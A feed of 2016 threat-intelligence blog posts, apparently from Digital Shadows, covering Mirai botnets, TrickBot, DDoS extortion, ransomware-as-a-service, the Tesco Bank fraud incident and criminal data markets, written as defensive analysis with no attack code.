    1. Stronger more impactful attacks – Hacktivists are usually motivated by a mix of ideological concerns and a desire to show off their power. Mirai would be an ideal means to achieve the latter. The attack on Brian Krebs had a peak volume of 620 Gbps, while that on the France-based internet service provider OVH reportedly measured over 1.5 Tbps. Hacktivist operations that have previously been seen as presenting only a very low threat may now take on added significance if participants are armed with IoT botnets.

    2. Changing tactics – The attacks on Brian Krebs, OVH and DynDNS underlined Mirai’s ability to cause a significant disturbance to these services, and this disruptive capability might allow hacktivist actors to perform more sophisticated operations in future.

    The attack against the Sony Playstation Network in 2011 resulted in the company taking the network offline for a number of days and the theft of personal data belonging to 77 million customers. It later transpired that PlayStation had been bombarded with DDoS attacks which made it more difficult for them to detect the intrusion. A powerful Mirai attack that renders a targeted site offline for a considerable amount of time could therefore be used as a smokescreen for a number of other types of attack – such as SQL injection to steal data or even alongside physical protests. Some may even begin extortion activities as the fear of Mirai could allow hacktivists to solicit funds from their victims or blackmail them into placating their particular cause.

    While the above may sound ominous, we should not make the mistake of thinking we’re on a one-way road to perdition. We should bear in mind the following:

    1. A certain level of technical capability is still needed to operate Mirai

    Although the source code has been released publicly, this does not necessarily mean that any individual can simply pick it up and launch a high-volume DDoS attack. Even before Mirai, many hacktivists sought the aid of stresser and booter services to help them launch DDoS attacks as they were unable to do so themselves. These services are likely to remain popular among novice users as they often provide real-time assistance and troubleshooting features, with some level of anonymity. A number of discussions we’ve detected on hacking forums already show that novice users are struggling to make use of Mirai, and that fellow users have not been so forthcoming in sharing their secrets.

    Mirai Hackforums1

     Mirai Hackforums2

    Figure 2: Desperate Mirai users on HackForums

    Despite this, “Mirai-as-a-service” offerings have already been detected – indicating that cybercriminals are attempting to monetize their Mirai capabilities in similar fashion to stresser and booter services. It remains to be seen, however, whether these become popular and if they even function as advertised.

    2. Land of plenty? Attackers are in competition for the IoT resource pool

    The original Mirai variant was believed to be able to target between 200,000 – 500,000 devices. A more recent variant, however, dubbed ‘Annie’ by its creator, can allegedly infect up to five million vulnerable devices. Though these estimates are concerning, we shouldn’t assume that attackers are inhabiting a socialist utopia where devices are freely available and shared for public use.

    Instead, attackers are competing directly with each other for control of these devices, which means it’s likely a few select individuals or groups are able to operate the largest botnets. Already there have been reports that the competition for devices has fractured Mirai’s power, creating a series of smaller botnets capable of smaller attacks. Attackers are now furiously searching for new infection vectors to gain an advantage over their competitors. Since the release of the Mirai source code, there have been reports of new Mirai variants that target new devices using different techniques. So although high-volume attacks are still a threat, the competition over the IoT resource pool will limit the ability of hacktivists to commandeer the most powerful botnets.

    3. Extortion threats are often hollow

    There will be a number of actors who will hope that targets will not call their bluff for threat of Mirai. Users of the Web Hosting Talk forum reported receiving Mirai extortion emails demanding a ransom of two Bitcoin (approximately $1320 USD). These appear to have been empty threats, with no attacks taking place after expiry of the stated 96 hour window.

    Mirai Extortion Senpai

    Figure 3: Extortion email threatening a Mirai attack [Source: Web Hosting Talk]

    It may be too early to state with complete confidence whether or not Mirai will change the practice of hacktivism. By continuing to monitor developments within the hacktivist community, however, and by forecasting what the post-Mirai landscape might look like in future, we can better prepare ourselves for these eventualities.

    Coming to a Country Near You? The Rapid Development of The TrickBot Trojan Fri, 16 Dec 2016 16:29:19 +0000 Since the discovery of TrickBot in September 2016, its operators have continued to develop the malware to include the targeting of new locations and customers of new banks. This was demonstrated by both independent reporting and through Digital Shadows’ analysis of the configuration files used by the malware. These files contain bank domains and URLs which, when visited by an infected user, are affected by webinjects which modify web page content for a visitor and allow for credentials to be harvested by an attacker. Furthermore, the domains in the configuration gave an insight into the choice of targeting by the malware’s operators, both in terms of the country and specific banks targeted. The timeline below outlines recent developments to this trojan’s targeting.

    TrickBot timeline

    Table 1 – Timeline of TrickBot activity since September 2016

    This malware was initially linked to at least one individual behind the Dyre banking trojan, for which activity ceased around February 2016. While the effective deployment of TrickBot and its subsequent rapid development was assessed to be consistent with a group that had considerable experience of banking trojan operations, this connection to the group responsible for the Dyre malware was not confirmed.

    In October 2016 TrickBot was known to have targeted bank customers in Australia and Canada, but throughout November and December 2016 both the number of banks affected and the locations of these banks increased dramatically. At the time of writing the number of bank and financial services domains included in a detected configuration file totaled approximately 85. This is shown based on separate geographical locations in Figure 1 below.

    TrickBot Target Geography

    Figure 1 – Graph showing the number of domains in each location affected by TrickBot activity

    Currently, the country most affected by TrickBot activity is Australia, based on the number of bank domains included in TrickBot’s configuration file. The reasons for this were unknown, but the overall targeting by TrickBot demonstrated that financial services customers in English-speaking countries were the most targeted. The number of locations that have been affected by TrickBot activity, coupled with the number of bank domains featured in the configuration files for this malware, demonstrated that the actors behind it likely had a relatively large amount of resources – including finances, capability and time. This assessment was based on the developments to the malware and the significant increase in the number of targets that we have observed within the three month period since TrickBot was first discovered. Broadening the targeting and attempting to access bank accounts through TrickBot activity would likely only be profitable provided that the appropriate resources were in place to cash out compromised bank accounts. Thus the increased scale of targeting for this malware was representative of not just a likely increase in development resources, but physical, human resources as well.

    The rate of development detected for TrickBot suggests it is likely that it would continue to be developed, including the addition of new target geographies and further banks to its configuration. The target geographies to date showed that a majority of TrickBot’s activity affected predominantly English-speaking countries, particularly in relation to financial services and banks. This may give some insight into potential future targets for this malware; nevertheless, it was assessed as a realistic possibility that further non-English speaking geographies would also be affected in future.

    The statistics in Figure 1 indicate that Trickbot had primarily affected customers of banks and financial services in Australia. As the number of banks in Australia that have been targeted has continued to increase since the malware’s discovery in September 2016, it was assessed as likely that the targeting of the Australian region would continue in the near future.

    Banking trojans, while not as widely reported as other malware such as ransomware, have continued to be perceived as profitable by threat actors and groups throughout 2016. While some disruption to the infrastructure and operations of these trojans has occurred – for example law enforcement operation launched in October 2015 against the Dridex malware has reportedly partially disturbed its activity – we detected no indication to suggest that overall banking trojan activity would reduce in 2017.

    Crowdsourced DDoS Extortion – A Worrying Development? Tue, 13 Dec 2016 15:35:09 +0000 We all know about DDoS extortion – the process is straightforward. Contact the company, threaten to launch a crippling DDoS attack that will happen unless the company pays a ransom. But what if the actors do not target the company itself to pay the ransom, but its customers?

    DDoS extortion was hot stuff in the first half of 2016. While Europol announced the arrest of members of DD4BC, other actors going by names like Kadyrovtsy and Armada Collective emerged. Although there were less reports of DDoS extortion in the second half of 2016, the public release of the Mirai botnet source code offers new opportunities for extortionists.

    We’ve already seen examples of this, in the case of a DDoS against Squarespace. On November 22, 2016, the US-based web hosting and building service Squarespace was affected by two distributed denial of service attacks that affected customers between 0029 EST and 0954 EST. Some customers of Squarespace operate e-commerce sites, therefore it was assessed as likely that financial losses were incurred as a result of the attacks. Twitter accounts responded to statements by  Squarespace, claiming to be a previously known threat actor called “vimproducts”, who has advertised DDoS services on the AlphaBay Dark Web marketplace. These accounts were detected claiming responsibility for the DDoS attacks and attempting to extort Squarespace for up to $2,000 USD.

    In one post on Pastebin, the author described it as a “crowdfunded extortion”. While there was no evidence of a ransom being paid, it is possible that it was an attempt by vimproducts to generate publicity for their DDoS-as-a-service offering. The targeting of organizations’ customers is a worrying trend.

    Vimproducts Squarespace 

    Fig 1: Post on Pastebin claiming to be by Vimproducts


    Vimproducts service 

    Fig 2: Vimproducts advertising a DDoS service on a dark web marketplace

    More recently, on November 29, 2016, customers of Valartis Bank received ransom messages from an unidentified actor claiming to possess their account data and demanding 10 percent of their balance in order to prevent their data from being leaked. Valartis Bank’s parent company reportedly confirmed a breach took place but stated only payment order information was obtained. Statements made by the author of the messages published in the Bild newspaper suggested a realistic possibility the attackers had attempted to approach the bank itself prior to contacting customers.

    The threat of DDoS and extortion attacks on retailers and e-commerce sites are particularly heightened during the run up to Christmas. Actors will likely deem the busy sales period as an opportune moment to showcase their capability or to cause widespread disruption by targeting retailers.

    While the case of vimproducts and Squarespace may have occurred as a secondary approach to gaining a ransom payment, what if this was the first target for adversaries? How prepared would companies be to combat this threat? Organizations should consider such alternative scenarios in 2017, as the public release of Mirai can act as a force multiplier for criminal operations.

    You Should Consider Forecasts, Not Predictions Fri, 09 Dec 2016 16:41:44 +0000 Well it’s that time of year again. Sorry, not the Lexus December to Remember Sales Event (don’t you just love those commercials), rather 2017 prediction season. Vendors and media alike take out their crystal balls and peer into the future. Given my 4+ years as a Forrester analyst, I’ve written many predictions as well. Speaking of analyst predictions, Rich Mogul, from Securosis has some of the best predictions ever made; check them out. Rich’s perspective is shared by many who loathe prediction season. 

    Given that Digital Shadows has a team of former law enforcement/government/military intelligence analysts, as well as classically trained graduate level intelligence analysts, we should take advantage of it. Instead of writing yet another predictions blog, we decided to leverage the same type of structured analysis techniques we use to service our clients to develop a forecast. Given the coverage/hype/hysteria surrounding Mirai and IoT denial of service we decided to focus our forecast on that. On Wednesday December 14th, we will be conducting two live webinars. You can sign up for “Forecasting the 2017 DDoS landscape” here.

    For the webinars, we are going to use an analysis technique known as the Cone of Plausibility (see figure 1). According to “Creating Strategic Visions” from the US Army War College, the Cone of Plausibility is a “theoretical process that can be used by one or more persons to project trends and events and their consequences holistically into the future.” It “permits a logical progression into time and the creation of alternative scenarios at preselected points or intervals called forecast or planning focus planes.”

    Cone of Plausibility Methodology 

    Figure 1. Cone of Plausibility  

    The Cone of Plausibility is useful to the analyst and the intelligence consumer in that it provides a structured way of forecasting possible future scenarios, as well as an audit trail of how the scenarios were developed. The forecast isn’t a high-level claim made with little if no analytical rigor. This is because all of the drivers that are assessed to contribute to a given question are listed alongside analyst assumptions of how these drivers will continue. The Cone of Plausibility also allows assumptions to be changed in order for other scenarios, such as wild cards to be developed. 

    Before creating scenarios, it is necessary to agree upon the timeframe to consider. The current and historical conditions are then assessed, enabling the analysts to identify the main drivers and trends that contribute to the forecast. 

    In order to produce the three scenarios (preferred, probable, and wildcard), underlying assumptions are explicitly listed. The most probable or “baseline” scenario is built upon a continuation of what we have already observed, coupled with any future influencing events that may change a scenario. Estimating the likelihood of a scenario is largely based on what we have seen already, coupled with an analyst’s experience and assumptions. 

    In order to produce alternative plausible scenarios, one or two assumptions are changed, resulting in different outcomes. Changing even more assumptions in a radical way will create a vastly different, possible scenario – known as a wild card.

    In this way, the cone of plausibility allows for the development of scenarios that are within the bounds of possibility and allows for the thought process behind these scenarios to be more clearly documented and understood. While any number of scenarios can be generated using the cone of plausibility, three provides a solid spectrum for consideration. You can check out this Scenario Planning document for more information.

    For this week’s webinars, we are going to use the Cone of Plausibility model to provide forecasts for: 

    • Threat Actors Using DDoS as a Protest Tool

    • Threat Actors Using DDoS as an Extortion Tool

    • Threat Actors Using DDoS as a Political Tool


    Adam Lorimer and I hope you will join us. 

    The Top Three Most Popular Blogs of 2016 Thu, 08 Dec 2016 15:01:28 +0000 It’s been a great year for the Digital Shadows blog, we started it off winning the “Best New Security Blog or Podcast” at the Security Blogger Awards at RSA Conference. This year we produced a wide range of posts focusing on the activities of hacktivists, cybercriminals and nation state actors. When we looked back at this year’s statistics, there were three blogs that really resonated and caught the attention of our readers.

    1. An Analysis of Competing Hypotheses for the Tesco Bank Incident

    In November, following reports of fraudulent activity on some Tesco Bank customer accounts, there was a high level of ambiguity around how the attacks were conducted. This made it a good candidate for an Analysis of Competing Hypothesis (ACH). This blog post outlined four hypotheses and assessed the available evidence to ascertain which one was least inconsistent with the information available. This blog was picked up by The Register, who wrote their own article on the findings.

    Analytical tradecraft has been popular among readers, with previous blogs on the Intelligence Cycle and Language of Uncertainty having also attracted significant attention.

    2. Your One Stop Shop For Cybercrime

    While researching the activities of the actor known by the alias “Tessa88”, we came across an outsourced online shop offering called Just as we have seen with the DDoS-as-a-service market, there continues to be a lowering of barriers to entry for into the cybercriminal world. This site is a reminder that the dark web does not monopolize criminality, and the clear web can teach us just as much – if not more – about the activities of cybercriminals. This blog was picked up by a range of publications, such as Softpedia, Infosecurity Magazine and SC Magazine.

    3. 97 percent of the top 1000 companies suffer from credential compromise

    Third, our research into credential exposure revealed the extent to which organizations’ employees have been leaked online. As we continue to see reports of password reuse, the research provided an overview of how adversaries use this information and what you can do to protect yourself. This research went on to be featured in the Financial Times and Fortune.

    Check out these three blogs and stayed tuned for some great content coming your way in 2017.

    DS Blog mentions

    Fig 1: Some items from the Digital Shadows blog that were picked up by the media

    A Model of Success: Anticipating Your Attackers’ Moves Thu, 01 Dec 2016 15:21:09 +0000 In a previous blog, we discussed the role of planning in offensive operations and the power that effective planning affords an actor. For an actor conducting an offensive operation, their capability to achieve their goal is predicated on a number of things:

    • The number of different scenarios that they can envisage at each stage of the operation
    • Their ability to still operate effectively in each scenario despite imposed limitations

    Depending on the type of attacker, their tools, tactics and procedures mean that they are able to respond to changes in their operational environment. A low capability actor may be more of a “one trick pony”, exploiting a particular known SQL injection vulnerability or having a single phishing payload. Once that avenue is discovered by the defenders and appropriate controls are deployed, that particular actor is frozen out. A more capable actor will have either planned for such a scenario or have the resources to be able to improvise within an appropriate operational timescale.

    Being able to predict when such roadblocks might be appear requires a certain level of anticipatory decision making from the adversary. That is, being able to anticipate the likely moves of the target in advance. The closer these predictions track reality, the greater the chance of the attacker’s success in breaching the target and completing its mission will be. In order to track reality as closely as possible, the attackers must have a model of the defenders, if not specifically for a particular target, then at least in general. This model must give, at the very least, a rough outline of the tools, tactics and procedures that defenders typically use in order to prevent intrusions.

    For example, in order to protect against phishing, organizations often operate a Spam blacklist, block certain types of attachments, disable Macros across the organization and conduct security awareness training for employees. An effective attacker, must be aware of these security controls and have options to bypass them, for example, hijacking high reputation domains to evade blacklists, knowing which tricks can be used to bypass attachment filtering, such as embedding files inside of whitelisted or commonly accepted attachment types, having a number of options for gaining code execution on an endpoint, e.g., through embedding OLE packages and knowing that the basic phishes may be caught so using a template that you know will be likely to be accepted, such as using a template that mimics a known supplier to the target organization.

    Similarly, in order for defenders to be successful at protecting their networks, they must also have a model of attacker behavior which allows them to predict and anticipate the likely moves that attackers will make as they try to achieve their goals. Unfortunately this attacker model – also known as a threat model – is often neglected by many organizations. By not fully understanding which attackers are likely to target an organization based on which critical assets are present and which capabilities these attackers have, it is difficult to build a model which accurately anticipates what are the likely approaches an attacker is liable to make.

    The main issue with a poor model is that it leads to incorrect prioritization of security controls. Spear-phishing with Macro-enabled Microsoft Office documents is still the preferred route for initial compromise in targeted intrusions but many organizations do not arrange their security priorities in such a way as to mitigate this threat first and foremost. Similarly, the exploitation of vulnerable browser plugins by exploit kits to deploy ransomware is another significant threat to organizations. Still many organizations do not have a robust set of practices to patch these plugins in a timely fashion and deploy exploit mitigations like the (sadly to be missed) Microsoft EMET system.

    At Digital Shadows, we follow the approach to threat modelling as laid out by the CBEST intelligence-led testing approach. An introduction to this can be found in the “An Introduction to Cyber Threat Modelling” document. It describes how to understand the goal-orientation of the threat actor, the capabilities they possess and their general modus operandi. This allows a defender to systematically develop a model of attack behavior and match that to their organization’s critical assets. Through understanding which threat actors are known to target particular critical assets (e.g., Point of Sale terminals, sensitive internal documents or customer data) and a comprehensive assessment of threat actor capabilities, an organization can better plan for likely attacker scenarios.

    Windows Shopping: 7 Threats To Look Out For This Holiday Season Wed, 23 Nov 2016 17:39:57 +0000 Thanksgiving, Black Friday, Cyber Monday, Christmas. There’s a lot of shopping to be done between now and the end of 2016. As throngs of discerning shoppers flock to the high street and online shopping carts are filled to the brim, cybercriminals are busy preparing their wares to take advantage of the high sales period. With this in mind, we decided to outline some of the biggest threats facing both retailers and consumers in the upcoming holiday season:

    1. DDoS attacks – With the Mirai botnet demonstrating its ability to launch high-volume denial of service (DDoS) attacks, some might deem the busy sales period as an opportune moment to showcase their capability or cause widespread disruption by targeting retailers. Allied to this is the threat of DDoS extortion, as attackers may use the threat of disabling retail operations during the busiest period of the year as a means of earning a quick profit. Just this week the web hosting and building service Squarespace was affected by two DDoS attacks that affected a number of e-commerce sites. A user on the AlphaBay Dark Web marketplace claimed responsibility for the attacks and alleged they had tried to extort Squarespace for up to $2,000 USD, though this was not confirmed. The same user also advertised their DDoS services online, specifying their availability on Black Friday (see Figure 1 and Figure 2 below).

    Figure1 min

    Figure 1: AlphaBay user offers DDoS botnet rental service

    Figure2 min

    Figure 2: The same user specifies that they can conduct attacks on particular days – for example Black Friday (Nov 25)

    2. Compromise of e-commerce sites – This issue has emerged as a problem in 2016 with thousands of ecommerce sites being infected with key-loggers designed to steal credit card data entered into online checkout forms. Many of the compromised websites ran the Magento shopping cart system, though other platforms such as Powerfront CMS and OpenCart, as well as payment processing systems such as Braintree and VeriSign were also purportedly targeted.

    3. POS malware – Cybercriminals are likely to exploit the large number of transactions conducted during the next month by targeting point of sale devices (POS) such as card readers and payment terminals. When a new campaign for the POS malware known as FastPoS was discovered in September 2016, it became clear that the malware was still under active development. A similar pattern was detected in 2015, whereby new campaigns and upgrades appeared to occur in the months leading up to Christmas. It’s highly likely that the same will occur in 2016.

     4. Skimming – In similar vein to POS malware, cybercriminals will likely seek to take advantage of the increased number of withdrawals made at ATMs this season. These card reading devices aren’t always easy to spot. In September, U.S authorities warned of a new technique known as ‘periscope skimming’ which involves the use of a specialized skimming device connected directly to the ATM’s internal circuit board.[1] This technique was likely developed in response to anti-skimming measures, and criminals are almost certain to be developing new ways to avoid detection.

     5. Phishing pages – Attackers will try and trick users through fake websites that at face value look incredibly similar to those belonging to legitimate retailers. These sites, however, often steal victims’ credentials when they try to make a purchase, or will be used as a landing page to download a particular strain of malware. We expect phishing email campaigns encouraging users to visit these sites to be particularly prevalent at this time of year.

     6. Malvertising – Attackers can use online advertising as a means of distributing malware, luring victims with one-time offers and bargain prices. These will usually involve an attacker injecting malicious code into a legitimate advert which will either download malware directly onto a victim’s machine or redirect visitors to a website that facilitates the distribution of malware. Pop-ups, banners and promotional offers pushed through social media feeds can be used for these purposes. Sometimes attackers even create adverts that appear to point to legitimate sites by shortening or changing the URL displayed on the advert itself.

     7. Banking malware – Banking trojans remain a threat all-year round, but research from Kaspersky has indicated that attacks using financial malware increased around the time of Black Friday and Cyber Monday, and the Christmas period in 2014 and 2015.[2] One reason for this might be that as more people shop online during this time, attackers will try and distribute their malware via fake or compromised sites, or through phishing email campaigns. These can also be used to deliver additional malicious payloads. A recent Kronos banking trojan phishing campaign, for example, was discovered to be targeting victims in the UK and US. While Kronos infections are bad enough, Kronos was also downloading a new POS malware dubbed ScanPOS which was capable of stealing credit card numbers.




    Ransomware-as-a-service: The Business Case Tue, 22 Nov 2016 18:02:13 +0000 It can be tempting to dismiss cybercriminal activity as merely the workings of opportunistic actors looking to make a fast buck. While sometimes true, we should remember that cybercriminal operations can be highly sophisticated endeavors often backed by sound business logic and based upon established practices implemented by legitimate businesses. The rise of malware-as-a-service offerings is testament to this, with cybercriminals realizing that there are great profits to be made from providing their services to actors with less technical capabilities.

    One particular business model – ransomware-as-a-service (RaaS) – has been on the rise over the past 12 months. These services allow ransomware operators to rent out their variants to customers, who will spread the malware in return for a percentage of the profits. In July the cybercriminal group Janus announced that the Petya and Mischa ransomware variants were available for rent, while in August the Shark Ransomware Project was launched, allegedly allowing customers to create their own customizable malware with the operators accruing 20 percent of the profits. Recent reports have suggested that the Cerber RaaS offering had takings of over $200 million USD per month, which serves to underscore the immense profitability of this model.

    At Digital Shadows we try to take an attacker’s-perspective in order to identify the most pertinent threats facing our clients. By the same token, we can use this approach to better understand the rise of RaaS.

    So what’s the business case? What is immediately obvious is that RaaS allows the ransomware operator to dramatically increase the number of infections and scale of targeting in ways that could not be achieved if they operated the ransomware themselves. Traditional ransomware variants rely on a distribution network of only a handful of campaigns; Cerber, on the other hand, reportedly currently runs over 160 active campaigns, infecting nearly 150,000 victims with a profit of $195,000 in July 2016 alone.[1] Sounds good, but what are the hidden costs and weaknesses of this model, and what threats and opportunities can we forecast? By using a SWOT analysis we can go some way to understanding some of the considerations that cybercriminals have to take into account:

    SWOT analysis Ransomware min

    Figure 1: SWOT analysis of RaaS business model

    What becomes clear is that successful RaaS offerings rely on their owners treating their operations like a legitimate business. This means building up a strong reputation, marketing your service effectively across underground forums, providing a level of customer service for your users, and dealing with issues of liability. Another interesting consequence of the need to legitimize these businesses is that cybercriminals have begun to move away from the relative obscurity of the dark web in order to market their services. The Shark Ransomware Project (Figure 2) was hosted on the deep web (i.e. not indexed by traditional search engines) rather than on the dark web, while the Janus group use Twitter as a means of advertising and engaging with customers of their Petya and Mischa offerings (see Figure 3).

    Shark Ransomware min

    Figure 2: Shark Ransomware Project homepage

     Decrypter Ransomware min

    Figure 3: “Your call is very important to us. Please stay on the line.”

    These business models are by no means unique or coincidental to ransomware. Many other groups offer tools such as malware customizers and simple point-and-click distributed denial-of-service (DDoS) solutions that offer botnets for hire. This transition also mirrors developments in the software industry in the late 2000s when software-as-a-service (SaaS) and platform-as-a-service (PaaS) products became ubiquitous.

    This parallel can also help us forecast the ways in which these newer cybercriminal marketplaces will develop. The shift to SaaS and PaaS generally resulted in an increase in the quality of products as competition intensified. Likewise, it is likely that as more RaaS offerings come onto the market operators will not only have to improve the quality of their ransomware variants, but will also have to focus on refining the user-experience and customer service elements of their businesses. As competition increases, the less effective RaaS products will likely disappear, while those with the best reputation will consolidate their place in the market. The Shark Ransomware Project, for example, was forced to undergo a complete re-branding exercise after reports that the service’s creator was keeping all the profits severely damaged its reputation. Re-launched as the Atom Ransomware Affiliate Program (AKA AtomProject), the operators sought to drive home the improved usability features of the service, which included a new GUI interface for easier customization, unlike the older Shark predecessor which used a command line interface (see Figure 4 and Figure 5).

    Atom 1 Ransomware min

    Figure 4: Atom Ransomware Affiliate Program advertised on criminal location

    AtomProject Ransomware min

    Figure 5: AtomProject marketer emphasizes the new interface and easier to use payload builder


    [1] CheckPoint, CerberRing: An In-Depth Expose on Cerber Ransomware-as-a-Service, 15 Aug 2016

    Leak on Aisle 12! An Analysis of Competing Hypotheses for the Tesco Bank Incident Fri, 11 Nov 2016 15:59:09 +0000 On November 6, 2016 multiple UK media outlets reported that the UK-based Tesco Bank had informed approximately 40,000 customers that fraudulent activity had been detected on their accounts between November 5 and 6, 2016. It was initially reported that approximately 20,000 of these accounts had been the victim of successful fraudulent transactions. However, it was later reported that actual number of affected accounts was only approximately 9,000, from which an estimated £2.5 million GBP (approximately $3.1 million USD) had been stolen through fraudulent online transactions. On November 7, 2016 the UK National Cyber Security Centre (NCSC) issued a statement that announced that an investigation was underway, but that the organization was “unaware” of any threat to the wider UK banking sector as a result of this incident.

    In addition to this media reporting, we have identified multiple instances of Tesco Bank customers claiming that fraudulent online transactions had been made from their accounts over the weekend. We identified multiple independent reports stating that a small transaction of around £20 GBP (approximately $25 USD) were initially made, followed by a larger transaction of between £500 and £800 GBP ($621-994 USD). We also identified one user claiming that cash had been fraudulently withdrawn from his account from an ATM located in Rio de Janeiro.

    An examination of online criminal activity assessed to be potentially related to this incident indicated that in 2016, Tesco Bank login pages were included as a target in the config files of three major banking trojans: Vawtrak, Dridex and Retefe. In addition to this, we identified a user on the forum associated with the criminal marketplace AlphaBay claiming to be able to cash-out Tesco Bank accounts with the assistance of an insider at the bank. This post was dated September 2016.

    Alphabay forum post tesco

    Figure 1 – Screenshot of AlphaBay forum post referring to an insider at Tesco Bank.

    At the time of writing, very little information had been released regarding how these thefts were conducted, though several sources have publically expressed theories regarding how the attack may have been achieved. In response to this ambiguous situation, Digital Shadows has applied the technique of the Analysis of Competing Hypothesis (ACH) to the available data. ACH is a structured analytical technique designed to enable analysts to establish the consistency and inconsistency of all available data points with a selection of possible hypotheses. ACH uses a weighted inconsistency algorithm to assign numeric values, weighted by the assessed reliability and relevance of each data point, which represent the degree of inconsistency of the available evidence with a given hypothesis. The following hypotheses relating to how the attack may have been accomplished were examined:

    • H1 – Tesco Bank’s payment system was compromised, either through an external intrusion or insider action.
    • H2 – The attack was a cash-out operation representing the culmination of a banking trojan campaign targeting Tesco Bank customers.
    • H3 – The attack was a cash-out operation targeting Tesco Bank cards cloned prior to being issued to customers.
    • H4 – The attack was a cash-out operation using Tesco Bank card information obtained from multiple sources, such as third-party site compromises or point of sale malware.

    Tesco Bank ACH

    Figure 2 – ACH diagram

    Although it was not possible to definitively rule out any of the four hypotheses examined, we assess that the available information indicate that H2 (banking trojan) and H4 (cash-out using aggregated card information) are less consistent with the available information than H1 (payment system compromise) and H3 (cash-out of cloned cards). A number of data points were assessed to be inconsistent with these hypotheses, most notably the NCSC statement that the Tesco Bank incident did not represent a threat to the wider UK banking sector, the short timeframe of the attack and the reported focus on current accounts as opposed to credit accounts.

    At the time of writing none of the available data points were assessed to be significantly inconsistent with either H1 (payment system compromise) or H3 (cash-out of cloned cards) so it was not possible to determine which of these hypotheses was more likely to be accurate. However, it was assessed that H3 (cash-out of cloned cards) would likely have been a simpler to execute than H1 (payment system compromise) and, in operational terms, would have involved fewer moving parts. While this cannot be counted as a concrete data point, it was assessed to potentially indicate that H3 (cash-out of cloned cards) may be the more plausible scenario. Although reporting from Tesco Bank has indicated that money was successfully stolen from only 9.000 accounts, the actors responsible reportedly targeted 40,000 within a 48 hour period. This would likely have required substantial resources and a well-organized logistics network to support the process of cashing out the targeted accounts and laundering the money obtained within such a short timeframe. Irrespective of the method employed, it was therefore assessed to be highly likely that these thefts were conducted by an organized criminal group.

    Statements made by Tesco have indicated that the company is collaborating with the NCSC and the UK National Crime Agency (NCA) in investigating this incident. However, all three organizations have declined to provide substantive details regarding the incident, citing the need to preserve the integrity of the investigation. However, it was assessed to be likely that further information will be made available as the investigation continues.

    It is a realistic possibility that the actors responsible for these thefts will attempt to further monetize any Tesco Bank account information in their possession by attempting to sell it within the criminal ecosystem.

    In the immediate future, it’s likely Tesco Bank customers will be targeted with phishing emails imitating law enforcement or Tesco Bank customer support. Tesco Bank customers are advised to exercise caution when receiving calls or opening emails or SMS messages purporting to relate to this incident and to report any suspected phishing attempts to Tesco Bank via

    Top 5 Threats to the Media and Broadcasting Industry Fri, 11 Nov 2016 11:20:26 +0000 For media and broadcasting organizations, the threat of having their websites forced offline is a significant one. We looked beyond DDoS to understand the threats to broadcasting and media organizations in 2016 and outlines steps they can take to prevent and mitigate potential threats.

    While IoT botnets can act as a force multiplier for otherwise ineffective hacktivist campaigns (such as OpSilence and OpClosedMedia), DDoS attacks are only one piece of a far larger threat landscape for media organizations. Security professionals must understand the other threats that pose risks to their industry, including extortion, propaganda, malvertising and leaked data. By understanding the actors targeting your organization – as well as the tools they are using – organizations can take a more proactive approach to security.

     Top 5 Threats to Media

    Figure 1: Top 5 Threats to the Media and Broadcasting Industry

    Aside from DDoS, one threat media organizations should consider is malvertising. “Malvertising” is the use of online advertising to spread malware and is often used as a vector to compromise users who visit legitimate websites. Malvertising spreads most readily as a result of users utilizing out-of-date software that can be compromised by clicking a link to a malicious website. Because advertising content can be inserted into high profile and reputable websites, malvertising provides online criminals with an opportunity to push their attacks to web users who might not otherwise see the advertisements, due to the use of firewalls or other safety precautions. Some of the most popular websites for this are news sites. An example of an actor targeting media organizations is AdGholas, which exploited a critical remote code execution vulnerability in Internet Explorer.

    Other substantial threats to the media and broadcasting industry include data breaches account takeover. Over the last four years, there have been numerous cases of media and broadcasting organizations undergoing breaches and these are outlined below. In addition to these, there are also third party breaches that impact your organization. For the world’s biggest 1,000 companies, those organizations in entertainment industry saw the exposure of nearly 1 million email and password combinations. These can be used in account takeovers, spam campaigns and for credential stuffing.

     Media Data Breach Victims

    Organizations should look beyond the risks associated with availability of services and also consider the threat posed by extortion, propaganda, malvertising and leaked data. By understanding these, media and broadcasting companies can better placed to secure themselves and their customers.

    To learn tips to avoid cyber attacks in the media and broadcasting industry, check out the 1 page report below.

    To get the latest in cyber threat intelligence and digital risk management, subscribe to our threat intelligence emails here.

    Surveying the Criminal Market Tue, 08 Nov 2016 09:04:19 +0000 It’s no secret your personal information and data is valuable to cybercriminals, but is there more of a market for certain types of data than others? During our research into criminal forums and marketplaces, it’s never surprising to see personal data on sale, be it payment card details, social security numbers, compromised accounts or databases. So how common is the trade of these types of data, and how do they compare to each other in terms of how frequently they advertised? To establish some indication of this, we ran searches for keywords and phrases on over 300 criminal locations. The results of which are shown in Figure 1.

    Items for sale criminal marketplaces

    The graph shows that the discussion of payment card details is considerably more frequent than the other data types. This is not to say that the number of mentions in the graph directly translate to the number of payment card details being sold, but I would argue that it highlights how frequently this data is traded, sold and posted to criminal forums and marketplaces. There are a number of possible explanations for this, but I would say that credit card details can be easily monetized by cybercriminals, which in turn increases the demand for this type of information. This is evident through the large number of clear and dark web sites dedicated to the sale of payment card details, called automated vending carts (AVCs), examples of which include Rescator and Bestvalid. Quite simply, there is readily accessible money behind a compromised payment card details, while monetizing a social security number, account or a database can take a lot more time and effort.

    Further contributing to the overwhelming disparity between discussions of payment card details and the other highlighted commodities could be the relatively large number of methods by which they can be compromised. For instance, it’s possible for attackers to use physical skimming devices, point of sale malware, keyloggers, phishing pages and other forms of social engineering and even data breaches to steal or acquire compromised payment card information. These factors are all likely to contribute to the number of payment card details available on criminal forums and marketplaces.

    While our findings relating to keywords cannot be used to quantify the number of payment card details, or indeed other commodities, being sold on criminal locations, the findings do provide insight in to how popular each type of data is. Research such as this helps us to understand the state of the cybercriminal marketplace, including what cybercriminals can most easily obtain, and what is likely to be perceived as the most profitable commodity. Developing this understanding in turn enables us to develop a stronger appreciation of the cybercrime ecosystem, which helps develop our appreciation of a threat actor’s environment.

    Overexposed and Under-Prepared; The Risks of Oversharing Online Tue, 08 Nov 2016 08:56:01 +0000 I have a confession to make.

    I know where you live.

    I also know who you’re married to and the names of your children. I even know the name of your dog (who, by the way, looks really cute in your profile picture). I was sorry to see that your planning application got turned down, the ground floor extension looked like it would have been a lovely addition to your home in those plans I found. While I have your attention, let me ask how you’ve been getting on with your yoga class? The class you go to at the sports centre looks fun and I’m thinking of joining. It’s quite conveniently located, right next to your kid’s school. Listen, if you fancy a chat one day I can give you a call. I found your phone number in the WHOIS information for your website. Or if you’re busy I can email you? Would you prefer I use your work or personal email? Or I can pop by for a visit? After all, I know where you live.

